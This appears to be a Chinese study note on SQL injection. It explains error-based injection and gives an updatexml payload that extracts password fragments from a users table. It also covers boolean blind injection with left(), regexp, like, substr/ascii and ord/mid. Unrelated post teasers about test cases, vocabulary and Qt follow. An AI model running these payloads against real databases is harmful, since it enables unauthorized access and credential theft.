報錯注入
原理:構造payload讓資訊通過錯誤提示回顯出來
應用場景:查詢不會先內容,但是會列印錯誤資訊
upload、insert等語句,會列印錯誤資訊
方法:凡是可以讓錯誤資訊顯示的函式(語句),都能實現報錯注入
如果返回值超過32位,顯示不出來,就使用substrr進行擷取
and updatexml(1,concat(0x7e,(select substr(concat(password),1,2)from users limit 0,1),0x7e),1)--+
布林盲注
原理:我們可以通過構造語句,來判斷資料庫資訊的正確性,在通過頁面的「真」和「假」來識別我們的判斷是否正確,這就是布林盲注。
方法:構造邏輯判斷語句,判斷資訊的真假,取出所有的真值,實現sql注入
1、 left()函式 left(database(),b)>'a'
//database() 顯示資料庫名稱,left(a,b)從左側擷取前b位
2、 regexp
//select user() regexp '^r' 正規表示式的用法,user()結果為root,regexp為匹配root的正規表示式
3、 like
//select user() like 'ro%',與regexp類似,使用like進行匹配
4、 substr()函式
ascii()函式
//ascii(substr((select database()),1,1))=115 避免過濾和轉義單引號
5、 ord()函式
mid()函式
//ord(mid((select user()),1,1))=114
mid(a,b,c)從位置b開始,擷取a字串的c位。ord()函式同ascii(),將字元轉為ascii值
培訓 DAY3 測試基礎技能
測試用例編寫 測試用例主要包含哪些內容 測試用例設計例項 測試用例 test case 是為某個特殊目標而編制的一組測試輸入 執行條件以及預期結果,以便測試某個程式路徑或核實是否滿足某個特定需求。測試工作的核心 軟體需求的具體對照 測試用例可以用來衡量乙個專案測試質量。測試用例的健壯性,完整性,覆蓋...
日積月累 day3
sector 扇區,段 分段 vertically 豎直地,直立地 horizonally 水平地backspace 退格,回退 terminate 端接,終止 drag 拖,拉,牽,拽 formatted 有格式的 underscore 在.下面劃線 initially 最初,開頭 reforma...
QT程式設計 day3
當建立乙個專案之後,資料夾裡會有6個檔案。其中有乙個為.pro.user檔案,這個檔案不屬於專案源 的一部分,它是qtcreator專屬的使用者定製專案設定,儲存了這個專案本地化的設定。qtcreator開啟專案時會讀取這個設定檔案,比較該專案裡的檔案配置與當前的專案位置等是否符合,符合就載入配置,...